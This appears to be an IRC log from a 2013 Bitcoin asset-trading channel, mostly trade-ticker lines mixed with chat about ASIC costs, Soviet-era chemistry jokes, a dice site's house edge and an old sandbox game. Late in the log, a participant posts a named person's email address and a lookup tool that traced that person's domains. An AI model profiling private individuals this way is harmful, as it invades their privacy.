[DMS.PURCHASE] 40 @ 0.01193 = 0.4772 BTC [+] Sep 15 02:35:40 [BTCTC] [LABCOIN] 249 @ 0.001893 = 0.4714 BTC [-] Sep 15 02:35:42 [BTCTC] [LABCOIN] 200 @ 0.001891 = 0.3782 BTC [-] Sep 15 02:35:43 [BTCTC] [LABCOIN] 1 @ 0.00189 BTC [-] Sep 15 02:35:44 [BTCTC] [LABCOIN] 5 @ 0.001889 = 0.0094 BTC [-] Sep 15 02:35:44 [BTCTC] [LABCOIN] 99 @ 0.00188 = 0.1861 BTC [-] Sep 15 02:35:46 [BTCTC] [LABCOIN] 1000 @ 0.001867 = 1.867 BTC [-] Sep 15 02:35:47 [BTCTC] [LABCOIN] 426 @ 0.001866 = 0.7949 BTC [-] Sep 15 02:37:13 [BTCTC] [DMS.MINING] 40 @ 0.002584 = 0.1034 BTC [+] Sep 15 02:41:38 asciilifeform: let's have some estimate based off this ? http://www.singularity.com/charts/page62.html Sep 15 02:42:25 if i read it correctly, now we have 8.58E-19 $/Transistor/Hz Sep 15 02:42:29 jurov: forget about transistors, take the cost of actually melting Si as the base minimum Sep 15 02:42:49 no Si boule, no asic. Sep 15 02:43:03 the end of the free market and silicon cartel cca 2003 is well visible on that plot Sep 15 02:43:07 which makes me thing it must be acurate. Sep 15 02:43:12 but transistor cost is directly related and there are many expesive chemicals irreducibly needed Sep 15 02:44:19 you can ignore the graph and postulate the 'death of moore's law' theoretical transistor/power/mm^2 maximum, and use that. Sep 15 02:44:57 i'd prefer to just stick to their 2016 projection Sep 15 02:45:50 let's have say "small" 1million-transistor ASIC at 10GHz Sep 15 02:46:09 [BTCTC] [CIPHERMINE-PT] 7 @ 0.0575 = 0.4025 BTC [-] Sep 15 02:46:10 [BTCTC] [CIPHERMINE-PT] 13 @ 0.0577 = 0.7501 BTC [+] Sep 15 02:46:12 ;;calc 2e-19*1e6*10e9 Sep 15 02:46:13 Error: invalid syntax (, line 1) Sep 15 02:46:16 we don't have a very good model to map hash to transistor count yet. Sep 15 02:46:20 [BTCTC] [CIPHERMINE-PT] 10 @ 0.059 = 0.59 BTC [+] Sep 15 02:46:21 [BTCTC] [CIPHERMINE-PT] 10 @ 0.0595 = 0.595 BTC [+] Sep 15 02:46:35 [BTCTC] [CIPHERMINE-PT] 10 @ 0.0595 = 0.595 BTC [+] Sep 15 02:46:37 [BTCTC] [CIPHERMINE-PT] 5 @ 0.05995 = 0.2998 BTC [+] Sep 15 02:46:38 [BTCTC] [CIPHERMINE-PT] 5 @ 0.05995 = 0.2998 BTC [+] Sep 15 02:46:43 ;;calc 2e-19 * 1e6 * 10e9 Sep 15 02:46:44 Error: invalid syntax (, line 1) Sep 15 02:46:46 [BTCTC] [CIPHERMINE-PT] 20 @ 0.05997 = 1.1994 BTC [+] Sep 15 02:47:11 it's $ 0.002 Sep 15 02:47:48 not bad price for floor filler Sep 15 02:48:28 jurov: what does ordinary cement cost where you live? heater coils? Sep 15 02:48:41 amusingly about same lol Sep 15 02:49:10 so hurry up & pour asic cement? Sep 15 02:49:36 that';d be the fucking end oif it, when i go to cash and carry, buy two sacks of nano particulate silicone cement Sep 15 02:49:39 we,, there already are attepts for self-assembling chips Sep 15 02:49:40 mix with water, pour into shapes Sep 15 02:49:45 would be interesting to come up with an RF-powered btc asic. you could indeed pour those in! Sep 15 02:49:48 and within a day i have working asic floor tile Sep 15 02:49:53 like the rfid tags in truck tires. Sep 15 02:50:15 mayweather gonna do it again tonight? Sep 15 02:50:24 someone needs to put his lights out Sep 15 02:50:26 mix, pour, warm concrete floor and a wireless AP for the backhaul. Sep 15 02:50:46 asciilifeform the soviets had a recipe for warm concrete floor Sep 15 02:50:52 but it was a little unfriendly. Sep 15 02:51:03 a la new york mafia? Sep 15 02:51:09 only stays warm for a day or so, though Sep 15 02:51:13 a la why bother with calcium carbonate, Sep 15 02:51:18 use strontium carbonate instead Sep 15 02:51:38 lol Sep 15 02:51:50 also saves on the blue lights neede Sep 15 02:51:50 d Sep 15 02:52:02 nice little surprise for the scrap iron hunters after the Collapse! Sep 15 02:52:14 dig for rebar and die. Sep 15 02:53:39 [BTCTC] [DMS.MINING] 2 @ 0.002645 = 0.0053 BTC [+] Sep 15 02:54:05 if i were teaching a nuclear physics class the next assignment would be, Sep 15 02:54:31 calculate the maximum thickness of rebar allowable if 1% strontium is radioactive. Sep 15 02:55:00 another fun soviet recipe: Sep 15 02:55:06 uranium carbide + water Sep 15 02:55:22 result is a little something that can mostly pass for gasoline. Sep 15 02:55:23 does it make radioacetilene ? Sep 15 02:55:34 you get heavier hydrocarbons Sep 15 02:55:39 usable as liquid fuel. Sep 15 02:55:54 nobody was stupid enought to actually scale this up, AFAIK. Sep 15 02:56:34 you could make UC out of depleted uranium. Sep 15 02:56:57 i think the only reason this didn't go into mass production was that its energy-negative Sep 15 02:57:10 but that hasn't exactly stopped the American corn fuel idiots Sep 15 02:57:40 so maybe uranium carbide has a future after all... Sep 15 02:57:50 i should perhaps write to explain the entire us corn situation, seeing how im probably the only one that both understands it and isn't sworn to secrecy Sep 15 02:58:41 is there something there other than the chumpatron (gullibility to dollars converter) obvious to a 1st year chemistry student? Sep 15 02:58:54 yup. Sep 15 02:59:04 do spill the beans then Sep 15 02:59:04 im getting to it, gimme a coupla hours. Sep 15 03:00:53 you could spend a lifetime studying fun soviet recipes (trinary computer; or my personal favourite, the 'subterrine' - nuclear reactor melts a tunnel in front of you in real time...) Sep 15 03:00:55 corn is good for pretty much nothing Sep 15 03:00:57 http://www.pnas.org/content/early/2013/09/04/1308718110 Sep 15 03:01:32 mircea_popescu: pls have a look to withdrawals first Sep 15 03:03:18 "American corn fuel" is such a big fail Sep 15 03:05:41 [BTCTC] [LABCOIN] 490 @ 0.001994 = 0.9771 BTC [+] Sep 15 03:06:27 [MPEX] [S.MPOE] 2400 @ 0.00089197 = 2.1407 BTC [-] Sep 15 03:06:29 [MPEX] [S.MPOE] 982 @ 0.0008905 = 0.8745 BTC [-] Sep 15 03:06:46 [MPEX] [S.MPOE] 1399 @ 0.00089033 = 1.2456 BTC [-] Sep 15 03:06:47 [MPEX] [S.MPOE] 6850 @ 0.00088959 = 6.0937 BTC [-] Sep 15 03:08:27 [BTCTC] [LABCOIN] 1 @ 0.001908 BTC [-] Sep 15 03:14:32 [BTCTC] [ASICMINER-PT] 1 @ 2.102 BTC [+] Sep 15 03:14:32 [BTCTC] [ASICMINER-PT] 5 @ 2.101 = 10.505 BTC [-] Sep 15 03:14:34 [BTCTC] [ASICMINER-PT] 9 @ 2.1 = 18.9 BTC [-] Sep 15 03:14:36 [BTCTC] [CRYPTO-TRADE] 1 @ 0.197 BTC [-] Sep 15 03:14:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.0197 BTC [-] Sep 15 03:16:21 lets dice is open, get a low number: https://letsdice.com/?invite_info=104 Sep 15 03:18:36 [BTCTC] [ASICMINER-PT] 3 @ 2.101 = 6.303 BTC [+] Sep 15 03:18:38 [BTCTC] [ASICMINER-PT] 7 @ 2.1 = 14.7 BTC [-] Sep 15 03:22:47 toffoo: did they reset the accounts? Sep 15 03:23:55 [MPEX] [S.MPOE] 10050 @ 0.00088891 = 8.9335 BTC [-] Sep 15 03:23:57 [MPEX] [S.MPOE] 3302 @ 0.00088842 = 2.9336 BTC [-] Sep 15 03:24:04 dexX7 yes looks that way Sep 15 03:28:30 asciilifeform http://trilema.com/2013/the-corn-thing/ Sep 15 03:28:38 jurov i see it went. Sep 15 03:29:03 What does a low number even do? Sep 15 03:31:08 and ugh, 2% house edge Sep 15 03:31:36 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00065 = 0.0013 BTC [+] Sep 15 03:34:17 [BTCTC] [B.YABMC] 8 @ 0.0006 = 0.0048 BTC [-] Sep 15 03:37:24 [BTCTC] [CRYPTO-TRADE] 4 @ 0.197 = 0.788 BTC [-] Sep 15 03:39:05 Namworld that's a typical thing to say, Sep 15 03:39:24 but I've been thinking about it and it's really only a 1% edge, Sep 15 03:39:39 the claimed edge is 1.98%, Sep 15 03:39:56 but 0.48% of that goes into a jackpot, Sep 15 03:40:12 and the other 0.50% into their ponzi/invite scheme, Sep 15 03:40:26 so both go back to players eventually Sep 15 03:41:24 for the jackpot this is valid, mostly. Sep 15 03:41:30 but for the ponzi scheme is not. Sep 15 03:42:51 [HAVELOCK] [AM1] 1 @ 2.14499998 BTC [-] Sep 15 03:42:54 [HAVELOCK] [AM1] 10 @ 2.14499999 = 21.45 BTC [+] Sep 15 03:42:57 [HAVELOCK] [AM1] 1 @ 2.15 BTC [+] Sep 15 03:43:01 [HAVELOCK] [AM1] 1 @ 2.1509 BTC [+] Sep 15 03:43:04 [HAVELOCK] [AM1] 2 @ 2.1509 = 4.3018 BTC [+] Sep 15 03:43:08 [HAVELOCK] [AM1] 4 @ 2.152 = 8.608 BTC [+] Sep 15 03:43:10 [BTCTC] [DMS.MINING] 38 @ 0.002645 = 0.1005 BTC [+] Sep 15 03:43:41 [HAVELOCK] [AM1] 5 @ 2.152 = 10.76 BTC [+] Sep 15 03:46:45 ;;nethash Sep 15 03:46:45 952984.273899 Sep 15 03:47:18 mircea_popescu why do you think that? Sep 15 03:47:34 because playing more or less does in no way improve your chances to get anything from the 2nd thing Sep 15 03:47:37 they're unrelated. Sep 15 03:48:15 right, but it is still 0.50% of wagers that is paid to players, not the house Sep 15 03:50:50 pankkake: is there a bet for lab? Sep 15 03:51:12 toffoo yes but different "players", so it can't go into the edge discussion. Sep 15 03:51:21 no, some annoying moderator refused mine on bitbet Sep 15 03:51:34 i'm gonna start collecting these. Sep 15 03:52:30 [BTCTC] [S.BBET-PT] 48 @ 0.001499 = 0.072 BTC [+] Sep 15 03:52:35 pankkake: well i guess it would tend to "no" anyway Sep 15 03:53:21 it's just a way to test actually believe what they're saying Sep 15 03:53:29 [BTCTC] [S.BBET-PT] 1 @ 0.001499 BTC [+] Sep 15 03:53:30 my guess is that there would be zero yes Sep 15 03:54:02 mircea_popescu same with the jackpot. will almost certainly go to "different players". but if both jackpot and invite rewards to to "different players" then the real house edge is 1% Sep 15 03:54:55 it's not different players in this statistical sampling sense we are using the term. Sep 15 03:55:07 the jackpot goes to the exact set of players that played at 1.9% or w/e. Sep 15 04:01:00 not everything is down Sep 15 04:01:12 just scams Sep 15 04:02:08 lol 4-5 are up compared to yesterday and those are all low volume Sep 15 04:06:53 [BTCTC] [LABCOIN] 18 @ 0.001911 = 0.0344 BTC [+] Sep 15 04:06:54 [BTCTC] [LABCOIN] 8 @ 0.00191 = 0.0153 BTC [-] Sep 15 04:06:56 [BTCTC] [LABCOIN] 181 @ 0.00191 = 0.3457 BTC [-] Sep 15 04:06:57 [BTCTC] [LABCOIN] 10 @ 0.001909 = 0.0191 BTC [-] Sep 15 04:06:58 [BTCTC] [LABCOIN] 100 @ 0.001908 = 0.1908 BTC [-] Sep 15 04:06:59 [BTCTC] [LABCOIN] 10 @ 0.001907 = 0.0191 BTC [-] Sep 15 04:07:00 [BTCTC] [LABCOIN] 100 @ 0.001906 = 0.1906 BTC [-] Sep 15 04:07:00 [BTCTC] [LABCOIN] 20 @ 0.001904 = 0.0381 BTC [-] Sep 15 04:07:02 [BTCTC] [LABCOIN] 53 @ 0.001903 = 0.1009 BTC [-] Sep 15 04:07:59 [BTCTC] [LABCOIN] 181 @ 0.001905 = 0.3448 BTC [+] Sep 15 04:08:01 [BTCTC] [LABCOIN] 47 @ 0.001903 = 0.0894 BTC [-] Sep 15 04:08:02 [BTCTC] [LABCOIN] 100 @ 0.001903 = 0.1903 BTC [-] Sep 15 04:08:03 [BTCTC] [LABCOIN] 200 @ 0.0019 = 0.38 BTC [-] Sep 15 04:08:05 [BTCTC] [LABCOIN] 2 @ 0.001881 = 0.0038 BTC [-] Sep 15 04:08:06 [BTCTC] [LABCOIN] 95 @ 0.00188 = 0.1786 BTC [-] Sep 15 04:08:07 [BTCTC] [LABCOIN] 375 @ 0.001876 = 0.7035 BTC [-] Sep 15 04:08:09 you should buy labcoin, even the CEO says stock will be 10x at end of october Sep 15 04:10:53 TRADING BFL MONARCH FOR LABCOIN STOCK Sep 15 04:11:14 just wait till bfl starts their "preorder trading plattform" >.< Sep 15 04:11:24 tat should do a pt Sep 15 04:12:15 I wonder if they will take fees Sep 15 04:12:19 mirca should do a pt of lolcoin Sep 15 04:12:57 for good measure it should be a fractional reserve PT Sep 15 04:13:50 not worth the hassle, tbh. Sep 15 04:14:13 i used to do that back in the glory days of the pmbs, coupla years ago, with the synth assets. Sep 15 04:19:28 [BTCTC] [TAT.ASICMINER] 6 @ 0.0197 = 0.1182 BTC [-] Sep 15 04:19:29 [BTCTC] [TAT.ASICMINER] 3 @ 0.0196 = 0.0588 BTC [-] Sep 15 04:19:31 [BTCTC] [TAT.ASICMINER] 41 @ 0.0196 = 0.8036 BTC [-] Sep 15 04:20:40 [BTCTC] [BITVPS] 28 @ 0.0018 = 0.0504 BTC [-] Sep 15 04:21:02 [BTCTC] [LABCOIN] 380 @ 0.001876 = 0.7129 BTC [-] Sep 15 04:22:24 [HAVELOCK] [SDSTM] 17 @ 0.00249 = 0.0423 BTC [+] Sep 15 04:22:28 [HAVELOCK] [SDSTM] 5 @ 0.00232 = 0.0116 BTC [-] Sep 15 04:22:31 [HAVELOCK] [SDSTM] 492 @ 0.00231001 = 1.1365 BTC [-] Sep 15 04:26:21 [BTCTC] [LABCOIN] 2 @ 0.001947 = 0.0039 BTC [+] Sep 15 04:26:22 [BTCTC] [LABCOIN] 2 @ 0.001948 = 0.0039 BTC [+] Sep 15 04:26:23 [BTCTC] [LABCOIN] 10 @ 0.001949 = 0.0195 BTC [+] Sep 15 04:26:25 [BTCTC] [LABCOIN] 10 @ 0.00195 = 0.0195 BTC [+] Sep 15 04:26:26 [BTCTC] [LABCOIN] 200 @ 0.001987 = 0.3974 BTC [+] Sep 15 04:26:27 [BTCTC] [LABCOIN] 200 @ 0.001988 = 0.3976 BTC [+] Sep 15 04:26:40 [MPEX] [S.MPOE] 4506 @ 0.00088481 = 3.987 BTC [-] Sep 15 04:29:28 [BTCTC] [ACTIVEMINING] 10 @ 0.002724 = 0.0272 BTC [-] Sep 15 04:29:29 [BTCTC] [ACTIVEMINING] 10 @ 0.002725 = 0.0273 BTC [+] Sep 15 04:29:29 [BTCTC] [ACTIVEMINING] 130 @ 0.002767 = 0.3597 BTC [+] Sep 15 04:30:55 [BTCTC] [LABCOIN] 129 @ 0.00188 = 0.2425 BTC [-] Sep 15 04:30:56 [BTCTC] [LABCOIN] 358 @ 0.001878 = 0.6723 BTC [-] Sep 15 04:30:58 [BTCTC] [LABCOIN] 2600 @ 0.001877 = 4.8802 BTC [-] Sep 15 04:30:59 [BTCTC] [LABCOIN] 1245 @ 0.001876 = 2.3356 BTC [-] Sep 15 04:31:00 [BTCTC] [LABCOIN] 286 @ 0.001876 = 0.5365 BTC [-] Sep 15 04:31:01 [BTCTC] [LABCOIN] 2049 @ 0.001875 = 3.8419 BTC [-] Sep 15 04:32:33 "Even the NO side, which I imagine is supported by all of the #bitcoin-assets fanboys" Sep 15 04:32:42 who's the fanboy ?! Sep 15 04:33:22 [BTCTC] [LABCOIN] 114 @ 0.001877 = 0.214 BTC [+] Sep 15 04:33:24 [BTCTC] [LABCOIN] 951 @ 0.001875 = 1.7831 BTC [-] Sep 15 04:33:25 [BTCTC] [LABCOIN] 2935 @ 0.001874 = 5.5002 BTC [-] Sep 15 04:35:21 fanboys don't understand the word fanboy Sep 15 04:36:04 [BTCTC] [BASIC-MINING] 2 @ 0.1162 = 0.2324 BTC [-] Sep 15 04:44:15 indeed. Sep 15 04:44:51 one of the dumbest douches on that forum, the phoenix guy. Sep 15 04:45:13 Blurg Sep 15 04:55:56 [HAVELOCK] [LABCO] 10 @ 0.00228 = 0.0228 BTC [-] Sep 15 04:56:38 [HAVELOCK] [CBTC] 20000 @ 0.00039 = 7.8 BTC [+] Sep 15 04:57:49 [HAVELOCK] [SDSTM] 2 @ 0.00231001 = 0.0046 BTC [-] Sep 15 04:58:14 CBTC price is very high, good deal. Sep 15 04:58:51 [BTCTC] [LABCOIN] 50 @ 0.001875 = 0.0938 BTC [+] Sep 15 04:59:42 [BTCTC] [LABCOIN] 14 @ 0.001875 = 0.0263 BTC [+] Sep 15 05:03:34 [BTCTC] [TAT.ASICMINER] 17 @ 0.02008 = 0.3414 BTC [+] Sep 15 05:07:05 (For selling) Sep 15 05:19:37 [BTCTC] [DMS.PURCHASE] 68 @ 0.01193 = 0.8112 BTC [+] Sep 15 05:20:38 [HAVELOCK] [AM100] 10 @ 0.02005 = 0.2005 BTC [+] Sep 15 05:21:17 [BTCTC] [ACTIVEMINING] 59 @ 0.002621 = 0.1546 BTC [-] Sep 15 05:21:18 [BTCTC] [ACTIVEMINING] 500 @ 0.00262 = 1.31 BTC [-] Sep 15 05:21:20 [BTCTC] [ACTIVEMINING] 2850 @ 0.002605 = 7.4243 BTC [-] Sep 15 05:21:21 [BTCTC] [ACTIVEMINING] 2500 @ 0.0026 = 6.5 BTC [-] Sep 15 05:21:22 [BTCTC] [ACTIVEMINING] 21 @ 0.002584 = 0.0543 BTC [-] Sep 15 05:21:23 [BTCTC] [ACTIVEMINING] 194 @ 0.002575 = 0.4996 BTC [-] Sep 15 05:21:24 [BTCTC] [ACTIVEMINING] 49 @ 0.002527 = 0.1238 BTC [-] Sep 15 05:21:26 [BTCTC] [ACTIVEMINING] 20 @ 0.002524 = 0.0505 BTC [-] Sep 15 05:21:27 [BTCTC] [ACTIVEMINING] 30 @ 0.002523 = 0.0757 BTC [-] Sep 15 05:21:28 [BTCTC] [ACTIVEMINING] 1265 @ 0.00252 = 3.1878 BTC [-] Sep 15 05:21:28 [BTCTC] [ACTIVEMINING] 650 @ 0.002505 = 1.6283 BTC [-] Sep 15 05:21:29 [BTCTC] [ACTIVEMINING] 25 @ 0.0025 = 0.0625 BTC [-] Sep 15 05:21:30 [BTCTC] [ACTIVEMINING] 250 @ 0.0025 = 0.625 BTC [-] Sep 15 05:21:31 [BTCTC] [ACTIVEMINING] 11587 @ 0.0025 = 28.9675 BTC [-] Sep 15 05:22:09 [HAVELOCK] [AM100] 15 @ 0.02009 = 0.3014 BTC [+] Sep 15 05:22:43 [BTCTC] [LABCOIN] 1 @ 0.001901 BTC [+] Sep 15 05:22:44 [BTCTC] [LABCOIN] 1 @ 0.0019 BTC [-] Sep 15 05:22:46 [BTCTC] [LABCOIN] 213 @ 0.001876 = 0.3996 BTC [-] Sep 15 05:22:47 [BTCTC] [LABCOIN] 1158 @ 0.001875 = 2.1713 BTC [-] Sep 15 05:22:48 [BTCTC] [LABCOIN] 4840 @ 0.001875 = 9.075 BTC [-] Sep 15 05:22:49 [BTCTC] [LABCOIN] 13787 @ 0.001874 = 25.8368 BTC [-] Sep 15 05:23:26 [BTCTC] [KENILWORTH] 900 @ 0.00171 = 1.539 BTC [-] Sep 15 05:23:27 [BTCTC] [KENILWORTH] 1 @ 0.0017 BTC [-] Sep 15 05:23:29 [BTCTC] [KENILWORTH] 2500 @ 0.001626 = 4.065 BTC [-] Sep 15 05:23:30 [BTCTC] [KENILWORTH] 400 @ 0.001625 = 0.65 BTC [-] Sep 15 05:23:31 [BTCTC] [KENILWORTH] 60 @ 0.001624 = 0.0974 BTC [-] Sep 15 05:23:32 [BTCTC] [KENILWORTH] 2000 @ 0.001624 = 3.248 BTC [-] Sep 15 05:23:34 [BTCTC] [KENILWORTH] 500 @ 0.001602 = 0.801 BTC [-] Sep 15 05:23:35 [BTCTC] [KENILWORTH] 1000 @ 0.001592 = 1.592 BTC [-] Sep 15 05:23:36 [BTCTC] [KENILWORTH] 2000 @ 0.00159 = 3.18 BTC [-] Sep 15 05:23:38 [BTCTC] [KENILWORTH] 138 @ 0.001541 = 0.2127 BTC [-] Sep 15 05:23:46 [BTCTC] [KENILWORTH] 1000 @ 0.00154 = 1.54 BTC [-] Sep 15 05:23:48 [BTCTC] [KENILWORTH] 999 @ 0.001538 = 1.5365 BTC [-] Sep 15 05:23:48 [BTCTC] [KENILWORTH] 1 @ 0.001428 BTC [-] Sep 15 05:23:49 [BTCTC] [KENILWORTH] 999 @ 0.001405 = 1.4036 BTC [-] Sep 15 05:24:07 [BTCTC] [LABCOIN] 1 @ 0.001986 BTC [+] Sep 15 05:24:41 [BTCTC] [ACTIVEMINING] 3706 @ 0.0025 = 9.265 BTC [-] Sep 15 05:25:02 someone just liquidate their portfolio Sep 15 05:25:35 where's the "Sell all the crap" meme. Sep 15 05:26:55 [BTCTC] [ACTIVEMINING] 10 @ 0.0025 = 0.025 BTC [-] Sep 15 05:27:59 At the closest meme generator. Sep 15 05:28:32 [BTCTC] [BTC-GROWTH] 5 @ 0.101 = 0.505 BTC [+] Sep 15 05:28:34 [BTCTC] [BTC-GROWTH] 6 @ 0.1001 = 0.6006 BTC [-] Sep 15 05:28:46 [BTCTC] [PETA-MINE] 1 @ 0.6598 BTC [+] Sep 15 05:29:44 [BTCTC] [BTC-GROWTH] 24 @ 0.1001 = 2.4024 BTC [-] Sep 15 05:29:46 [BTCTC] [BTC-GROWTH] 6 @ 0.1 = 0.6 BTC [-] Sep 15 05:32:52 [BTCTC] [TAT.ASICMINER] 4 @ 0.0201 = 0.0804 BTC [+] Sep 15 05:33:56 http://www.btcbbs.com/forum.php?mod=viewthread&tid=1875 Sep 15 05:34:04 chinese forums i never heard of heard of eulora. Sep 15 05:35:26 http://8btc.com/thread-671-1-1.html moar. apparently these heard of ThickAsThieves too Sep 15 05:36:25 [BTCTC] [BTC-GROWTH] 3 @ 0.1025 = 0.3075 BTC [+] Sep 15 05:36:29 [BTCTC] [LABCOIN] 6 @ 0.001994 = 0.012 BTC [+] Sep 15 05:43:08 [BTCTC] [DMS.MINING] 1 @ 0.002583 BTC [-] Sep 15 05:43:08 [BTCTC] [DMS.MINING] 40 @ 0.002583 = 0.1033 BTC [-] Sep 15 05:43:53 [BTCTC] [ASICMINER-PT] 1 @ 2.102 BTC [+] Sep 15 05:44:08 I hadn't noticed that post about the game. Sep 15 05:44:12 Looking good. Sep 15 05:44:38 from teh mechanics "Towns will be built by players or not exist" Sep 15 05:44:55 but i agree Sep 15 05:45:02 sounds interesting Sep 15 05:45:19 I love family line games Sep 15 05:45:22 [BTCTC] [LABCOIN] 660 @ 0.00199 = 1.3134 BTC [-] Sep 15 05:45:39 [BTCTC] [LABCOIN] 4 @ 0.001992 = 0.008 BTC [+] Sep 15 05:45:51 [BTCTC] [COGNITIVE] 1 @ 0.2338 BTC [+] Sep 15 05:46:27 i have not yet heard anyone say "you know what, i think it'll suck". either i'm really good at filtering my circle or else this game may be too cool to make. Sep 15 05:47:33 Well I love how it's looking right now. Sep 15 05:47:39 Sad it can't be developped faster. Sep 15 05:49:46 This looks like the dream game I've always wanted. Sep 15 05:49:58 In fact there used to be something old and similar in 2D Sep 15 05:50:05 what was it called ? Sep 15 05:50:28 There was NPC towns tho and it wasn't as awesome. Sep 15 05:50:37 But it had features to build, farm, craft. Sep 15 05:50:47 And as such guilds could build towns/castles and such. Sep 15 05:50:59 y'all farmers yo Sep 15 05:52:03 I'm afraid I don't remember the name. Sep 15 05:52:47 aw shucks. Sep 15 05:53:29 anyway, this will probably have a npc-ish town in the sense that it's likely the first one will be made by me, but i don't intend for that arrangement to be permanent. Sep 15 05:53:32 I can probably find it back Sep 15 05:54:24 i'm curious. Sep 15 05:58:19 [BTCTC] [LABCOIN] 35 @ 0.001994 = 0.0698 BTC [+] Sep 15 05:59:21 It might no longer exist Sep 15 06:01:30 [BTCTC] [LABCOIN] 1 @ 0.00195 BTC [-] Sep 15 06:02:40 [BTCTC] [LABCOIN] 1 @ 0.001878 BTC [-] Sep 15 06:02:41 [BTCTC] [LABCOIN] 17 @ 0.001877 = 0.0319 BTC [-] Sep 15 06:02:43 [BTCTC] [LABCOIN] 7 @ 0.001876 = 0.0131 BTC [-] Sep 15 06:03:36 Found it. Sep 15 06:03:40 http://www.rpgwo.com/screenshots.html Sep 15 06:04:02 That's old. Sep 15 06:04:15 [BTCTC] [LABCOIN] 17 @ 0.001877 = 0.0319 BTC [+] Sep 15 06:06:02 Unless in a protected land, you could pretty much build/destroy anything. Sep 15 06:06:07 Raise/lower ground Sep 15 06:06:25 craft/farm/raise/mine/etc. Sep 15 06:06:45 Or just wander around bashing stuff. Sep 15 06:07:02 [BTCTC] [LABCOIN] 1 @ 0.001879 BTC [+] Sep 15 06:07:04 [BTCTC] [LABCOIN] 8 @ 0.001878 = 0.015 BTC [-] Sep 15 06:07:35 Complete with food system, drowning possible, etc Sep 15 06:08:01 And highly customizable, such that someone could create his own server with his own item set and parts to craft. Sep 15 06:08:08 [BTCTC] [LABCOIN] 1 @ 0.001877 BTC [-] Sep 15 06:08:11 I recall a sci-fi servers with guns and etc. Sep 15 06:08:55 It was fully featured and great for the time. Sep 15 06:10:11 [BTCTC] [LABCOIN] 1 @ 0.001876 BTC [-] Sep 15 06:10:44 [BTCTC] [LABCOIN] 2 @ 0.001876 = 0.0038 BTC [-] Sep 15 06:11:42 [BTCTC] [LABCOIN] 1 @ 0.001876 BTC [-] Sep 15 06:12:34 hahaha, I'm seeing reviews on websites. Still reviews going into 2012 and giving it high rating. Sep 15 06:14:09 it run on windows, not my criteria of old! Sep 15 06:14:31 [BTCTC] [LABCOIN] 1 @ 0.001876 BTC [-] Sep 15 06:14:34 ok, ok... Sep 15 06:21:35 http://www.rpgwoforums.com/ Sep 15 06:21:51 Looks still quite active eheh Sep 15 06:28:18 [HAVELOCK] [CBTC] 200 @ 0.000399 = 0.0798 BTC [+] Sep 15 06:31:05 [BTCTC] [LABCOIN] 1 @ 0.001949 BTC [+] Sep 15 06:31:21 [BTCTC] [LABCOIN] 165 @ 0.001876 = 0.3095 BTC [-] Sep 15 06:33:44 [BTCTC] [LABCOIN] 15 @ 0.001876 = 0.0281 BTC [-] Sep 15 06:35:07 literally called rpg world online ?! Sep 15 06:36:07 Namworld http://www.rpgwo2.com/ seems guy made a v2 Sep 15 06:37:48 [BTCTC] [CIPHERMINE.B1] 4 @ 0.01047 = 0.0419 BTC [-] Sep 15 06:38:37 [BTCTC] [BTC-BOND] 3 @ 0.01 = 0.03 BTC [+] Sep 15 06:39:18 [BTCTC] [LABCOIN] 161 @ 0.001876 = 0.302 BTC [-] Sep 15 06:39:19 [BTCTC] [LABCOIN] 3278 @ 0.001874 = 6.143 BTC [-] Sep 15 06:39:21 [BTCTC] [LABCOIN] 1 @ 0.001872 BTC [-] Sep 15 06:39:22 [BTCTC] [LABCOIN] 1000 @ 0.001871 = 1.871 BTC [-] Sep 15 06:41:35 [MPEX] [S.MPOE] 8600 @ 0.00088546 = 7.615 BTC [+] Sep 15 06:41:36 [MPEX] [S.MPOE] 6850 @ 0.00088678 = 6.0744 BTC [+] Sep 15 06:51:51 Well would you look at that... Sep 15 06:52:25 Doesn't really look different Sep 15 06:54:31 [HAVELOCK] [XBOND] 1 @ 0.00118905 BTC [+] Sep 15 06:54:41 [BTCTC] [DMS.SELLING] 200 @ 0.0094 = 1.88 BTC [-] Sep 15 06:57:41 [HAVELOCK] [HIM] 10 @ 0.16 = 1.6 BTC [+] Sep 15 07:08:12 [BTCTC] [DMS.SELLING] 223 @ 0.0093 = 2.0739 BTC [-] Sep 15 07:12:46 mircea_popescu: wha? Sep 15 07:15:11 reeses i wrote a thing and of all the irc people you're possibly the only one misanthropic enough to read it well. Sep 15 07:15:33 oh, do please tell Sep 15 07:16:08 http://trilema.com/2013/the-progre/ Sep 15 07:16:11 read it, drop a link. Sep 15 07:16:12 if it's something I can read on my phone or tablets on the shitter, all the bettterretteerre Sep 15 07:16:19 [HAVELOCK] [CBTC] 1100 @ 0.000399 = 0.4389 BTC [+] Sep 15 07:16:23 nono, read it in the sense of, to a mic. Sep 15 07:16:29 you look like ahh Sep 15 07:16:32 http://www.explosm.net/comics/3297/ Sep 15 07:16:38 so you want my beautiful voice Sep 15 07:17:15 there's a bitcoin in it! Sep 15 07:17:54 lemme go grab a mic Sep 15 07:18:32 well, in my neighborhood, a lot of poseur gangsta types smoke brown-wrapped cigarillo-type stinkmakers Sep 15 07:18:32 btw Namworld : this is a cute little tool http://www.ipaddressden.com/email/mkudlo@hotmail.com.html Sep 15 07:18:45 the email came from a screenshot in the link. it found me all the guy's emails. Sep 15 07:18:49 domains i mean not emails. Sep 15 07:21:13 reeses why do you think they do that ? Sep 15 07:21:31 [MPEX] [S.MPOE] 11950 @ 0.00088543 = 10.5809 BTC [-] Sep 15 07:21:33 [MPEX] [S.MPOE] 2501 @ 0.00088481 = 2.2129 BTC [-] Sep 15 07:21:51 [MPEX] [S.MPOE] 3798 @ 0.00088386 = 3.3569 BTC [-] Sep 15 07:24:49 neat Sep 15 07:31:15 [HAVELOCK] [XBOND] 3 @ 0.00118905 = 0.0036 BTC [+] Sep 15 07:32:46 [BTCTC] [TAT.ASICMINER] 3 @ 0.0201 = 0.0603 BTC [+] Sep 15 07:37:40 [BTCTC] [LABCOIN] 26 @ 0.001948 = 0.0506 BTC [+] Sep 15 07:38:36 [BTCTC] [KENILWORTH] 1 @ 0.00176 BTC [+] Sep 15 07:39:19 [BTCTC] [KENILWORTH] 1 @ 0.001762 BTC [+] Sep 15 07:40:02 [BTCTC] [LABCOIN] 10 @ 0.001948 = 0.0195 BTC [+] Sep 15 07:40:46 [BTCTC] [LABCOIN] 137 @ 0.001905 = 0.261 BTC [-] Sep 15 07:40:48 [BTCTC] [LABCOIN] 290 @ 0.001903 = 0.5519 BTC [-] Sep 15 07:40:49 [BTCTC] [LABCOIN] 123 @ 0.0019 = 0.2337 BTC [-] Sep 15 07:48:09 [HAVELOCK] 